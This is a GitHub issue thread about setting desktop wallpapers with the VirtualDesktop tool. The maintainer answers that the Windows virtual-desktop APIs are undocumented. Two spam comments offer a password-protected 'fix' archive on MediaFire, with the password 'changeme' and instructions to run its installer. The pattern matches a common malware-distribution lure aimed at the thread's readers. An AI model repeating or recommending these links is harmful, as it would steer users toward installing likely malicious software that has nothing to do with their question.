### ISSUE TITLE
Desktop wallpaper

### ISSUE THREAD

**Issue by kuitog** [MScholtes/VirtualDesktop#88]
Can't figure out how to set a desktop wallpaper with a solid color. (Or in alternative with an image)

The SetDesktopWallpaper function is not documented.

thanks

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MScholtes** [comment]
Hello @kuitog,

I guess your question is not about a parameter to **Virtualdesktop** but about the underlying Windows API.

**Micrsosoft** does not document the **APIs** to virtual desktops and - even worse -  changes them very often. It is very tedious to find out how it works. As far as I know there is no way to set colours for virtual desktops, To learn the way to set wallpapers for different virtual desktops you have to analyse this repository or the variety of similiar repositories,

Greetings

Markus

**Comment by MScholtes** [comment]
I assume that the issue no longer exists as there is no feedback.
